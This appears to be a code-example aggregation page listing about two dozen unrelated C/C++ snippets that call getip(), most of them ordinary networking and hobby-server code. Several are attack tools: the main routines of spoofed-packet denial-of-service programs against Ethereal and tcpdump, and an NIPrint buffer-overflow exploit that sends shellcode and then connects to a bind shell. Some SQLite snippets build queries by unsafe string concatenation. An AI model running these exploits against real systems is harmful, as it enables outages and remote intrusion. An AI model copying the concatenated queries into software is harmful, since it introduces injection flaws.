Beispiel #1
0
/* begin. */
int main(int argc,char **argv) {
    unsigned char nospoof=0;
    unsigned int daddr=0,saddr=0;
    printf("\n[*] Ethereal <= 0.10.10 SMB DoS.\n[*] by Nicob (code ripped from vade79)\n\n");
    if(argc<2) {
        printf("[*] syntax: %s <dst host> [src host(0=random)]\n",
               argv[0]);
        printf("[*] syntax: %s <dst host> nospoof\n",argv[0]);
        exit(1);
    }
    if(!(daddr=getip(argv[1])))
        printe("invalid destination host/ip.",1);
    if(argc>2) {
        if(strstr(argv[2],"nospoof"))nospoof=1;
        else saddr=getip(argv[2]);
    }
    printf("[*] destination\t: %s\n",argv[1]);
    if(!nospoof)
        printf("[*] source\t: %s (spoofed)\n",(saddr?argv[2]:"<random>"));
    else
        printf("[*] source\t: real IP\n");
    printf("[+] sending packet ...");
    fflush(stdout);
    srandom(time(0));
    if(nospoof)nbt_nospoof(daddr);
    else nbt_spoof(daddr,saddr);
    printf(".");
    fflush(stdout);
    printf("\n[*] done.\n\n");
    fflush(stdout);
    exit(0);
}
Beispiel #2
0
/* begin. */
int main(int argc,char **argv) {
 unsigned char nospoof=0;
 unsigned int amt=DFL_AMOUNT;
 unsigned int daddr=0,saddr=0;
 printf("[*] tcpdump(/ethereal)[]: (RSVP) rsvp_print() infinite loop "
 "DOS.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)\n\n");
 if(argc<2){
  printf("[*] syntax: %s <dst host> [src host(0=random)] [amount]\n",
  argv[0]);
  exit(1);
 }
 if(!(daddr=getip(argv[1])))
  printe("invalid destination host/ip.",1);
 if(argc>2)saddr=getip(argv[2]);
 if(argc>3)amt=atoi(argv[3]);
 if(!amt)printe("no packets?",1);
 printf("[*] destination\t: %s\n",argv[1]);
 if(!nospoof)
  printf("[*] source\t: %s\n",(saddr?argv[2]:"<random>"));
 printf("[*] amount\t: %u\n\n",amt);
 printf("[+] sending(packet = .): ");
 fflush(stdout);
 while(amt--){
  /* spice things up. */
  srandom(time(0)+amt);
  rsvp_spoof(daddr,saddr);
  printf(".");
  fflush(stdout);
  usleep(50000);
 }
 printf("\n\n[*] done.\n");
 fflush(stdout);
 exit(0);
}
Beispiel #3
0
void sqlflow(const string &ss,long long liu,long long kai,long long tt) //向数据库写入流量信息
//ss是ID字符串,liu是流量,kai是起始时间,tt是终止时间
{
  char **jieguo=NULL;
  int hang=0,lie=0;
  string mac=getmac(ss),ip=getip(ss);
  yuju="SELECT * FROM flow WHERE mac='"+mac+"' AND ip='"+ip+"' AND ("+str(tt)+"-start<"+str(shezhi.pian)+");";
  //查询语句,用于检查是否含有间隔小于时间片的记录
  sqlf=sqlite3_get_table(db,yuju.c_str(),&jieguo,&hang,&lie,&sqlerr);
  if (jieguo!=NULL)
    sqlite3_free_table(jieguo);
  sqlgeterr(sqlf);
  if (!hang)//如果没有
  {
    yuju="INSERT INTO flow VALUES ('"+mac+"','"+ip+"',"+str(liu)+",'"+str(kai)+"','"+str(tt)+"');";
    //插入语句,插入一条记录
    sqlf=sqlite3_exec(db,yuju.c_str(),NULL,NULL,&sqlerr);
    sqlgeterr(sqlf);
  }
  else
  {
    if (hang>1)
    {
      exit(-1);
    }
    yuju="UPDATE flow SET data=data+"+str(liu)+",end='"+str(tt)+"' WHERE mac='"+mac+"' AND ip='"+ip+"' AND (";
    yuju+=str(tt)+"-start<"+str(shezhi.pian)+");";
    //更新语句,更新间隔小于时间片的记录,最后,同一个IP MAC组合的每条记录间隔都大于时间片,期间的流量累加
    sqlf=sqlite3_exec(db,yuju.c_str(),NULL,NULL,&sqlerr);
    sqlgeterr(sqlf);
  } 
}
Beispiel #4
0
void handlesession(){	//handle a session once it's established
	unsigned int rsize,strncmpval;
	rsize=recv_size(); printf("**rsz=%d\n",rsize);
	if (rsize>0){
		thisip.l=getip();
		if (recv0(buf,min(24,rsize))>0){ //get enough characters to distinguish the request
			printf("%s\n",buf);
  			if (strncmp((char *)buf,"POST /",6)==0){
  				bagelsinit(); //initialize game, send the form
  				uptime+=311; //250ms allowed for initialization
			}
			else if (strncmp((char *)buf,"GET /favicon",12)==0){
  				sendnak(); //no favicon here
  				uptime+=100; //100ms allowed for nak
			}
  			else if (strncmp((char *)buf,"GET /?G=",8)==0){
				bagelsturn();	//give player his turn
  				uptime+=376; //200ms allowed for each turn
			}
  			else if (strncmp((char *)buf,"GET /",5)==0){
 				bagelsinit(0); //initialize game, send the form
  				uptime+=311; //250ms allowed for initialization
			}
  			else{
				printf("\nmystery meat\n");
 				bagelsinit(0); //initialize game, send the form
  				uptime+=311; //250ms allowed for initialization
			}
		}
	}
  	if (rsize>0) flush(rsize);	//get rid of the received data
	disconnect0();	//in any case, we're done here
	printf("done\n>\n");
}
Beispiel #5
0
void bagelsinit(){
	int sendrc;
	static unsigned char hdr1[]="HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
						"<html><body><span style=\"color:#0000A0\">\r\n"
						"<center><h1>Olduino 1802 BAGELS Server</h1></center>";
	static unsigned char Inst1[]=
		"I AM THINKING OF A 3 DIGIT NUMBER.<BR>TRY TO GUESS " //50
		"MY NUMBER AND I WILL GIVE YOU CLUES AS FOLLOWS:<BR>"
		"...PICO - ONE DIGIT IS IN THE WRONG PLACE<BR>"
		"...FERMI - ONE DIGIT IS IN THE CORRECT PLACE<BR>"
        "...BAGELS - NO DIGIT IS CORRECT<P>";
	static unsigned char gform[]="<p><form method=\"GET\">\r\n"
						"<input type=\"text\" name=\"G\">"
						"<input type=\"submit\" value=\"Enter Your Guess\">\r\n"
						"</form>";
	static unsigned char trlr[]="</body></html>\r\n\r\n";
	int x=sizeof(trlr);
	sendconst(hdr1); 	// Now Send the HTTP Response first part
	printf("I.\n");
	//sendconst(Inst1); 	// Now Send the instructions
	send0(Inst1,sizeof(Inst1)-1); 	// Now Send the instructions
	printf(".I\n");
	sendconst(gform); 	// Now Send the rest of the page
	sendlit("<a href=\"http://goo.gl/p4C0Cg\">Olduino</a>: An Arduino for the First of Us<p>");
	sendconst(trlr); 	// Now Send the rest of the page
	thisip.l=getip();
	thisipslot=getipslot(thisip);//finds or assigns a slot for the ip
	setsecret();
	strcpy((char*)secrets[thisipslot],(char*)secret);
	printf("IP: %d.%d.%d.%d,slot %d,secret %s\n",thisip.c[0],thisip.c[1],thisip.c[2],thisip.c[3],thisipslot,secrets[thisipslot]);
}
Beispiel #6
0
void sqlspeed(const string &ss,long long liu,long long tt) //向数据库写入速度信息
//ss是ID串,liu是流量,tt是截止时间
{
  yuju="INSERT INTO speed VALUES ('"+getmac(ss)+"','"+getip(ss)+"',"+str(liu/shezhi.jiange)+",'"+str(tt)+"')";
  //插入语句,每次插入此IP MAC组合数据库更新间隔中的平均速度
  sqlf=sqlite3_exec(db,yuju.c_str(),NULL,NULL,&sqlerr);
  sqlgeterr(sqlf);
}
Beispiel #7
0
int main(){
	freopen("host_list_10000","r",stdin);
	char ip[16]="\0";
	char *host="baidu.com\0";
	getip(host,ip,0);
	printf("ip=%s\n",ip);
	freopen("host_list_10000","r",stdin);
	char c[100];
	int i=0;
	for(;i<100;++i){
		memset(c,0,sizeof(c));
		gets(c);
		memset(ip,0,sizeof(ip));
		getip(c,ip,0);
		printf("i=%d  ip=%s\n",i+1,ip);
	}
	return 0;
}
Beispiel #8
0
int main(int argc, char **argv) {

#ifdef _WIN32
	WSADATA wsaData;
#endif

	int sock;
	struct sockaddr_in sockstruct;
	char tmp[2000];


	if(!argv[1]) { printf("Usage: %s <address>\n",argv[0]);exit(0); }

#ifdef _WIN32

	if(WSAStartup(0x101,&wsaData)){
        printf("Unable to initialize WinSock lib.\n");
        exit(0);
	}

#endif

	memset(sockstruct.sin_zero,0x00,sizeof(sockstruct.sin_zero));
	sock=socket(PF_INET,SOCK_STREAM,0);
	sockstruct.sin_family=PF_INET; 
    	sockstruct.sin_addr.s_addr=getip(argv[1]);
    	sockstruct.sin_port=htons(515);

	if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {

	    printf("[+] Connected to %s:515!\n",argv[1]);

		memset(tmp,0x00,sizeof tmp);
		memset(tmp,0x41,49);
		*(long *)&tmp[strlen(tmp)]=RET;
		memset(tmp+strlen(tmp),0x90,50);
		memcpy(tmp+strlen(tmp),&shellcode,strlen(shellcode));
		send(sock,tmp,strlen(tmp),0);
		printf("[+] Exploit code was sent!\n");
    }

#ifdef _WIN32
	closesocket(sock);
	WSACleanup();
#else
	close(sock);
#endif

	printf("[+] Connecting to %s:%d\n",argv[1],SHELL);
	sprintf(tmp,"telnet %s %d\n",argv[1],SHELL);
	system(tmp);
	printf("[-] Not connected! NIPrint probably not vulnerable!\n");

	return 0;
}
Beispiel #9
0
void handlepost(){
	if (ledmode==1){
		ledmode=0;
		asm(" req\n"); //Q led off
	} else {
		ledmode=1;
		asm(" seq\n"); //Q led on
	}
	cmdip.l=getip();
	sendform();
	if (cmdip.l!=oldip.l){
		printf("IP %d.%d.%d.%d\n",cmdip.c[0],cmdip.c[1],cmdip.c[2],cmdip.c[3]);
		oldip.l=cmdip.l;
	}
}
Beispiel #10
0
idworker::idworker()
{
	char ip[100];
    getip(ip,sizeof(ip));
    uint64_t haship  = BKDRHash(ip) % 31; 
    uint64_t pd = getpid();
    uint64_t threadid = pthread_self();
	uint64_t machine_id = ( pd << 2 | threadid ) % 31;

	worker_id = ((haship << (workerIdBits - 5)) |  machine_id) & (maxWorkerId) ;
	sequence=0;
	lastTimestamp=0;

	//printf("hash(ip)=%llu, machine_id=%llu,worker_id=%llu\n",haship,machine_id,worker_id);
}
Beispiel #11
0
void bagelsinit(){
	int sendrc;
	games++;
	pages++;
	sendconst(hdr1a);send0s(itoa(pages,pnbuf)); sendconst(hdr1b); 	// Now Send the HTTP Response first part
	sendconst(Inst1); 	// Now Send the instructions
	sendconst(Inst2); 	// Now Finish the instructions
	sendconst(gform); 	// Now Send the rest of the page
	sendconst(olduinolink);
	sendconst(trlr); 	// Now Send the trailer
	thisip.l=getip();
	thisipslot=getipslot(thisip);//finds or assigns a slot for the ip
	setsecret();
	strcpy((char*)secrets[thisipslot],(char*)secret);
	printf("IP: %d.%d.%d.%d,slot %d,secret %s\n",
		thisip.c[0],thisip.c[1],thisip.c[2],thisip.c[3],thisipslot,secrets[thisipslot]);
}
int                     connect_to_host(char * host, int port)
{
    struct sockaddr_in  s_in;

    memset( &s_in, '\0', sizeof(struct sockaddr_in) );
    s_in.sin_family = AF_INET;
    s_in.sin_addr.s_addr = getip( host );
    s_in.sin_port = htons( port );
    if ((sock = socket( AF_INET, SOCK_STREAM, 0 )) <= 0)
        QUIT(ERR_CONN);
    if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)))
        QUIT (ERR_CONN);
#ifdef  SHITTEST
            sleep(15);
#endif
    fcntl(sock, F_SETFL, O_NONBLOCK);
    return (sock);
}
Beispiel #13
0
static void recv4() {
  int len;
  int interface;

  mh.msg_name=&sa4;
  mh.msg_namelen=sizeof(sa4);
  if ((len=recvmsg(s4,&mh,0))==-1) {
    perror("recvmsg");
    exit(3);
  }
  peer=(struct sockaddr*)&sa4;
  sl=sizeof(sa4);

  interface=v4if();
  getip(interface);

  handle(s4,buf,len,interface);
}
Beispiel #14
0
void handlesession() {	//handle a session once it's established
    unsigned int rsize,strncmpval;
    unsigned int tries=10;
    rsize=wizGetCtl16(SnRX_RSR); //get the size of the received data
    while(rsize==0 && tries-->0) {
        delay(20);
        printf("re-size ");
        rsize=wizGetCtl16(SnRX_RSR); //retry size of the received data
    }
    printf("**rsz=%d\n",rsize);
    if (rsize>0) {
        thisip.l=getip();
        if (recv0(buf,min(16,rsize))>0) { //get enough characters to distinguish the request
            printf("%s\n",buf);
            if (strncmp((char *)buf,"POST /",6)==0) {
                bagelsinit(); //initialize game, send the form
            }
            else if (strncmp((char *)buf,"GET /favicon",12)==0) {
                sendfavicon();
            }
            else if (strncmp((char *)buf,"GET /bitmap",11)==0) {
                sendbmp();
            }
            else if (strncmp((char *)buf,"GET /?G=",8)==0) {
                bagelsturn();	//give player his turn
            }
            else if (strncmp((char *)buf,"GET /T",6)==0) {
                bagelspeek(); //show the IP table
            }
            else if (strncmp((char *)buf,"GET /",5)==0) {
                bagelsinit(0); //initialize game, send the form
            }
            else {
                printf("\nmystery meat\n");
                bagelsinit(0); //initialize game, send the form
            }
        }
    }
    printf("flushing %d\n",rsize);
    if (rsize>0) flush(rsize);	//get rid of the received data
    wizCmd(CR_DISCON);// Disconnect the connection- we're done here
    printf("done\n>\n");
    sessions++;
}
Beispiel #15
0
 int cgiMain()
{
	 char *filename = "ip_config.conf";
	 char ip[16];
	 unsigned short portt = 8887;
	 int fd;
	 int readnd = 0;
	 char buffer[512];
	 getip(filename, ip);
	 fd = tcp_init_client(ip, portt);


	 int passed, conditioner, mode;
	 struct replay_packet * replay;

	 struct common_packet request;

	 request.head.len = sizeof(request.data);
	 request.head.encrpyt = ENCRPYT_NO;

	 request.head.ki = KI_AIRCONDITIONER;

	 cgiHeaderContentType("text/html");
	 cgiFormInteger("conditioner", &conditioner, 0);
	 cgiFormInteger("mode", &mode, 0);
	 cgiFormInteger("passed", &passed, 0);
	 request.head.ttl = conditioner;
	 request.head.mo = mode;
	 request.head.extent = passed;

	 writen(fd, (void *)&request, sizeof(struct register_struct));
	 readnd = readn(fd, (void *)buffer, sizeof(struct replay_packet));
	 replay = (struct replay_packet *)buffer;

	 if (readnd == sizeof(struct replay_packet)) {
	 	if (replay->head.ki == KI_REPLAY) {
	 			fprintf(cgiOut, "conditioner=%d;statuss=%d", conditioner, replay->data);
	 	}
	 }
	 tcp_close(fd);
	 return 0;
}
Beispiel #16
0
static void recv6() {
  int len,interface;

  mh.msg_name=&sa6;
  mh.msg_namelen=sizeof(sa6);
  if ((len=recvmsg(s6,&mh,0))==-1) {
    perror("recvmsg");
    exit(3);
  }
  peer=(struct sockaddr*)&sa6;
  sl=sizeof(sa6);

  if (IN6_IS_ADDR_V4MAPPED(sa6.sin6_addr.s6_addr))
    interface=v4if();
  else
    interface=sa6.sin6_scope_id;

  getip(interface);

  handle(s6,buf,len,interface);
}
/* Connect to a host */
int connect_host(char* host, int port)
{
	struct sockaddr_in s_in;
	int sock;

	s_in.sin_family = AF_INET;
	s_in.sin_addr.s_addr = getip(host);
	s_in.sin_port = htons(port);

	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) {
		printf("Could not create a socket\n");
		exit(1);
	}

	if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {
		printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno));
		exit(1);
	}

	return sock;
}
Beispiel #18
0
main() 
{ 
    long s; 
    char buf[MAX]; 
    if (getip(&s)) { 
     inet_ntop(PF_INET, (void *)(&s),  buf, MAX);
     printf("my ip address is %s\n",buf);
    } 

/* struct hostent {
      char    *h_name;        
      char    **h_aliases;   
      int     h_addrtype;   
      int     h_length;       
      char    **h_addr_list; 
 }
*/ 
     


} 
Beispiel #19
0
void handlesession(){	//handle a session once it's established
	unsigned int rsize,strncmpval;
	unsigned int tries=10;
	rsize=wizGetCtl16(SnRX_RSR); //get the size of the received data
	while(rsize==0 && tries-->0){
		delay(20);
		printf("re-size ");
		rsize=wizGetCtl16(SnRX_RSR); //retry size of the received data
	}
	printf("**rsz=%d\n",rsize);
	if (rsize>0){
		sessip.l=getip();
		if (recv0(buf,min(16,rsize))>0){ //get enough characters to distinguish the request
			printf("%s\n",buf);
  			if (strncmp((char *)buf,"POST /",6)==0){
				printf("\np\n");
  				handlepost(); //toggle LED, send the form
			}
			else if (strncmp((char *)buf,"GET /favicon",12)==0){
			printf("\nf\n");
  				sendnak(); //no favicon here
			}
  			else if (strncmp((char *)buf,"GET /",5)==0){
			printf("\ng\n");
 				sendform(); //send the form
			}
  			else{
				printf("\nmystery meat\n%s\n",buf);
				printf("IP %d.%d.%d.%d\n",sessip.c[0],sessip.c[1],sessip.c[2],sessip.c[3]);
 				send405(); //disallow oddball requests
			}
		}
		printf("flushing %d\n",rsize);
		if (rsize>0) flush(rsize);	//get rid of the received data
	}
	printf("\nd\n");
	wizCmd(CR_DISCON);// Disconnect the connection- we're done here
	printf(">\n");
	sessions++;
}
Beispiel #20
0
void getresp() {	//handle a session once it's established
    unsigned int rsize,strncmpval;
    unsigned int tries=500;
    printf("getting response\n");
    rsize=wizGetCtl16(SnRX_RSR); //get the size of the received data
    while(rsize==0 && tries-->0) {
        delay(20);
        printf("re-size ");
        rsize=wizGetCtl16(SnRX_RSR); //retry size of the received data
    }
    printf("**rsz=%d\n",rsize);
    if (rsize>0) {
        thisip.l=getip();
        if (recv0(buf,min(1023,rsize))>0) { //get some characters
            printf("%s\n",buf);
        }
    }
    printf("flushing %d\n",rsize);
    if (rsize>0) flush(rsize);	//get rid of the received data
    wizCmd(CR_DISCON);// Disconnect the connection- we're done here
    printf("done\n>\n");
}
Beispiel #21
0
static int
setfs(struct sockaddr_in *addr, char *path, char *p,
    const struct in_addr *siaddr)
{

	if (getip(&p, &addr->sin_addr) == 0) {
		if (siaddr != NULL && *p == '/')
			bcopy(siaddr, &addr->sin_addr, sizeof(struct in_addr));
		else
			return 0;
	} else {
		if (*p != ':')
			return 0;
		p++;
	}
		
	addr->sin_len = sizeof(struct sockaddr_in);
	addr->sin_family = AF_INET;

	strlcpy(path, p, MNAMELEN);
	return 1;
}
Beispiel #22
0
/** PASV command */
void ftp_pasv(Command *cmd, State *state)
{
  if(state->logged_in){
    int ip[4];
    int port;
    char buff[255];
    char *response = "227 Entering Passive Mode (%d,%d,%d,%d,%d,%d)\n";
    port = gen_port();
    getip(state->connection,ip);

    /* Close previous passive socket? */
    close(state->sock_pasv);

    /* Start listening here, but don't accept the connection */
    state->sock_pasv = create_socket(port);
    printf("port: %d\n",port);
    sprintf(buff,response,ip[0],ip[1],ip[2],ip[3],port>>8,port&0xff);
    state->message = buff;
    state->mode = SERVER;
    puts(state->message);

  }else{
Beispiel #23
0
void * sockschild(struct clientparam* param) {
 int res;
 unsigned i=0;
 SOCKET s;
 unsigned size;
 SASIZETYPE sasize;
 unsigned char * buf=NULL;
 unsigned char c;
 unsigned char command=0;
 struct pollfd fds[3];
 int ver=0;
 int havepass = 0;
 struct sockaddr_in sin;
 int len;


 param->req.sin_addr.s_addr = 0;
 param->service = S_SOCKS;

 if(!(buf = myalloc(BUFSIZE))) {RETURN(21);}
 memset(buf, 0, BUFSIZE);
 if ((ver = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_L], 0)) != 5 && ver != 4) {
	RETURN(401);
 } /* version */
 param->service = ver;
 if(ver == 5){
	 if ((i = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(441);} /* nmethods */
	 for (; i; i--) {
		if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(442);}
		if (res == 2 && !param->srv->nouser) {
			havepass = res;
		}
	 }
	 buf[0] = 5;
	 buf[1] = havepass;
	 if(socksend(param->clisock, buf, 2, conf.timeouts[STRING_S])!=2){RETURN(402);}
	 if (havepass) {
		if (((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_L], 0))) != 1) {
			RETURN(412);
		}
		if ((i = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(443);}
		if (i && (unsigned)(res = sockgetlinebuf(param, CLIENT, buf, i, 0, conf.timeouts[STRING_S])) != i){RETURN(444);};
		buf[i] = 0;
		if(!param->username)param->username = (unsigned char *)mystrdup((char *)buf);
		if ((i = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(445);}
		if (i && (unsigned)(res = sockgetlinebuf(param, CLIENT, buf, i, 0, conf.timeouts[STRING_S])) != i){RETURN(446);};
		buf[i] = 0;
		if(!param->password)param->password = (unsigned char *)mystrdup((char *)buf);
		buf[0] = 1;
		buf[1] = 0;
		if(socksend(param->clisock, buf, 2, conf.timeouts[STRING_S])!=2){RETURN(402);}
	 }
	 if ((c = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_L], 0)) != 5) {
		RETURN(421);
         } /* version */
 }
 if( (command = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) < 1 || command > 3){command = 0; RETURN(407);} /* command */
 if(ver == 5){
	 if (sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0) == EOF) {RETURN(447);} /* reserved */
	 c = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0); /* atype */
 }
 else {
	if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(448);}
	buf[0] = (unsigned char) res;
	if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(449);}
	buf[1] = (unsigned char) res;
	param->sins.sin_port = param->req.sin_port = *(unsigned short*)buf;
	c = 1;
 }
 
 switch(c) {
	case 1:
		for (i = 0; i<4; i++){
			if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(450);}
			buf[i] = (unsigned char)res;
		}
		param->sins.sin_addr.s_addr = param->req.sin_addr.s_addr = *(unsigned long *)buf;
		if(command==1 && !param->req.sin_addr.s_addr) {
			RETURN(422);
		}
		myinet_ntoa(param->sins.sin_addr, (char *)buf);
		break;
	case 3:
		if ((size = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(451);} /* nmethods */
		for (i=0; i<size; i++){ /* size < 256 */
			if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(452);}
			buf[i] = (unsigned char)res;
		}
		buf[i] = 0;
		param->sins.sin_addr.s_addr = param->req.sin_addr.s_addr = getip(buf);
		if(command==1 && !param->req.sin_addr.s_addr) {
			RETURN(100);
		}
		break;
	default:
		RETURN(998);
 }
 if(param->hostname)myfree(param->hostname);
 param->hostname = (unsigned char *)mystrdup((char *)buf);
 if (ver == 5) {
	 if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(453);}
	 buf[0] = (unsigned char) res;
	 if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(454);}
	 buf[1] = (unsigned char) res;
	 param->sins.sin_port = param->req.sin_port = *(unsigned short*)buf;
 }
 else {
	sockgetlinebuf(param, CLIENT, buf, BUFSIZE - 1, 0, conf.timeouts[STRING_S]);
	buf[127] = 0;
	if(!param->srv->nouser && *buf && !param->username)param->username = (unsigned char *)mystrdup((char *)buf);
	if(param->sins.sin_addr.s_addr && ntohl(param->sins.sin_addr.s_addr)<256){
		param->service = S_SOCKS45;
		sockgetlinebuf(param, CLIENT, buf, BUFSIZE - 1, 0, conf.timeouts[STRING_S]);
		buf[127] = 0;
		if(param->hostname)myfree(param->hostname);
		param->hostname = (unsigned char *)mystrdup((char *)buf);
		param->sins.sin_addr.s_addr = param->req.sin_addr.s_addr = getip(buf);
	}
 }
 if(command == 1 && !param->req.sin_port) {RETURN(424);}
 param->sins.sin_family = AF_INET;
 switch(command) { 
	case 1:
	 param->operation = CONNECT;
	 break;
 	case 2:
	 param->sins.sin_addr.s_addr = param->extip;
	 param->sins.sin_port = param->extport?param->extport:param->req.sin_port;
	 if ((param->remsock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {RETURN (11);}
	 param->operation = BIND;
	 break;
	case 3:
	 param->sins.sin_port = param->extport?param->extport:param->req.sin_port;
	 param->sins.sin_addr.s_addr = param->extip;
	 if ((param->remsock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == INVALID_SOCKET) {RETURN (11);}
	 param->operation = UDPASSOC;
	 break;
	default:
	 RETURN(997);
 }

 if((res = (*param->srv->authfunc)(param))) {RETURN(res);}

 if(command > 1) {
	if(bind(param->remsock,(struct sockaddr *)&param->sins,sizeof(param->sins))) {
		param->sins.sin_port = 0;
		if(bind(param->remsock,(struct sockaddr *)&param->sins,sizeof(param->sins)))RETURN (12);
#if SOCKSTRACE > 0
fprintf(stderr, "%s:%hu binded to communicate with server\n",
			inet_ntoa(param->sins.sin_addr),
			ntohs(param->sins.sin_port)
	);
fflush(stderr);
#endif
	}
	sasize = sizeof(struct sockaddr_in);
	getsockname(param->remsock, (struct sockaddr *)&param->sins,  &sasize);
	if(command == 3) {
		param->ctrlsock = param->clisock;
		param->clisock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
		if(param->clisock == INVALID_SOCKET) {RETURN(11);}
		sin.sin_family = AF_INET;
		sin.sin_addr.s_addr = param->srv->intip;
		sin.sin_port = htons(0);
		if(bind(param->clisock,(struct sockaddr *)&sin,sizeof(struct sockaddr_in))) {RETURN (12);}
#if SOCKSTRACE > 0
fprintf(stderr, "%s:%hu binded to communicate with client\n",
			inet_ntoa(sin.sin_addr),
			ntohs(sin.sin_port)
	);
fflush(stderr);
#endif
	}
 }
 param->res = 0;

CLEANRET:

 if(param->clisock != INVALID_SOCKET){
	sasize = sizeof(struct sockaddr_in);
	if(command != 3) getsockname(param->remsock, (struct sockaddr *)&sin,  &sasize);
	else getsockname(param->clisock, (struct sockaddr *)&sin,  &sasize);
#if SOCKSTRACE > 0
fprintf(stderr, "Sending confirmation to client with code %d for %s with %s:%hu\n",
			param->res,
			commands[command],
			inet_ntoa(sin.sin_addr),
			ntohs(sin.sin_port)
	);
fflush(stderr);
#endif
	if(ver == 5){
		buf[0] = 5;
		buf[1] = param->res%10;
		buf[2] = 0;
		buf[3] = 1;
		memcpy(buf+4, &sin.sin_addr.s_addr, 4);
		memcpy(buf+8, &sin.sin_port, 2);
		socksend((command == 3)?param->ctrlsock:param->clisock, buf, 10, conf.timeouts[STRING_S]);
	}
	else{
		buf[0] = 0;
		buf[1] = 90 + (param->res%10);
		memcpy(buf+2, &sin.sin_port, 2);
		memcpy(buf+4, &sin.sin_addr.s_addr, 4);
		socksend(param->clisock, buf, 8, conf.timeouts[STRING_S]);
	}

	if (param->res == 0) {
		switch(command) {
			case 1:
				if(param->redirectfunc){
					if(buf)myfree(buf);
					return (*param->redirectfunc)(param);
				}
				param->res = sockmap(param, conf.timeouts[CONNECTION_L]);
				break;
			case 2:
				listen (param->remsock, 1);
				
				fds[0].fd = param->remsock;
				fds[1].fd = param->clisock;
				fds[0].events = fds[1].events = POLLIN;
				res = poll(fds, 2, conf.timeouts[(param->req.sin_addr.s_addr)?CONNECTION_S:CONNECTION_L] * 1000);
				if (res < 1 || fds[1].revents) {
					res = 460;
					break;
				}
				sasize = sizeof(param->sins);
				s = accept(param->remsock, (struct sockaddr *)&param->sins, &sasize);
				closesocket(param->remsock);
				param->remsock = s;
				if(s == INVALID_SOCKET) {
					param->res = 462;
					break;
				}
				if(param->req.sin_addr.s_addr && param->req.sin_addr.s_addr != param->sins.sin_addr.s_addr) {
					param->res = 470;
					break;
				}
#if SOCKSTRACE > 0
fprintf(stderr, "Sending incoming connection to client with code %d for %s with %s:%hu\n",
			param->res,
			commands[command],
			inet_ntoa(param->sins.sin_addr),
			ntohs(param->sins.sin_port)
	);
fflush(stderr);
#endif
				if(ver == 5){
					memcpy (buf+4, &param->sins.sin_addr, 4);
					memcpy (buf+8, &param->sins.sin_port, 2);
					socksend(param->clisock, buf, 10, conf.timeouts[STRING_S]);
				}
				else {
					memcpy (buf+2, &param->sins.sin_port, 2);
					memcpy (buf+4, &param->sins.sin_addr, 4);
					socksend(param->clisock, buf, 8, conf.timeouts[STRING_S]);
				}

				param->res = sockmap(param, conf.timeouts[CONNECTION_S]);
				break;
			case 3:
				param->sins.sin_addr.s_addr = param->req.sin_addr.s_addr;
				param->sins.sin_port = param->req.sin_port;
				myfree(buf);
				if(!(buf = myalloc(LARGEBUFSIZE))) {RETURN(21);}

				for(;;){
					fds[0].fd = param->remsock;
					fds[1].fd = param->clisock;
					fds[2].fd = param->ctrlsock;
					fds[2].events = fds[1].events = fds[0].events = POLLIN;

					res = poll(fds, 3, conf.timeouts[CONNECTION_L]*1000);
					if(res <= 0) {
						param->res = 463;
						break;
					}
					if (fds[2].revents) {
						param->res = 0;
						break;
					}
					if (fds[1].revents) {
						sasize = sizeof(struct sockaddr_in);
						if((len = recvfrom(param->clisock, buf, 65535, 0, (struct sockaddr *)&sin, &sasize)) <= 10) {
							param->res = 464;
							break;
						}
						if(sin.sin_addr.s_addr != param->sinc.sin_addr.s_addr){
							param->res = 465;
							break;
						}
						if(buf[0] || buf[1] || buf[2]) {
							param->res = 466;
							break;
						}
						switch(buf[3]) {
							case 1:
								i = 8;
								memcpy(&param->sins.sin_addr.s_addr, buf+4, 4);
								break;
							case 3:
								size = buf[4];
								for (i=4; size; i++, size--){
									buf[i] = buf[i+1];
								}
								buf[i++] = 0;
								param->sins.sin_addr.s_addr = getip(buf+4);
								break;
							default:
								RETURN(996);
						 }

						memcpy(&param->sins.sin_port, buf+i, 2);
						i+=2;

						sasize = sizeof(param->sins);
						if(len > (int)i){
							if(socksendto(param->remsock, &param->sins, buf+i, len - i, conf.timeouts[SINGLEBYTE_L]*1000) <= 0){
								param->res = 467;
								break;
							}
							param->statscli+=(len - i);
							param->nwrites++;
#if SOCKSTRACE > 1
fprintf(stderr, "UDP packet relayed from client to %s:%hu size %d, header %d\n",
			inet_ntoa(param->sins.sin_addr),
			ntohs(param->sins.sin_port),
			(len - i),
			i
	);
fprintf(stderr, "client address is assumed to be %s:%hu\n",
			inet_ntoa(sin.sin_addr),
			ntohs(sin.sin_port)
	);
fflush(stderr);
#endif
						}

					}
					if (fds[0].revents) {
						struct sockaddr_in tsin;
						sasize = sizeof(tsin);
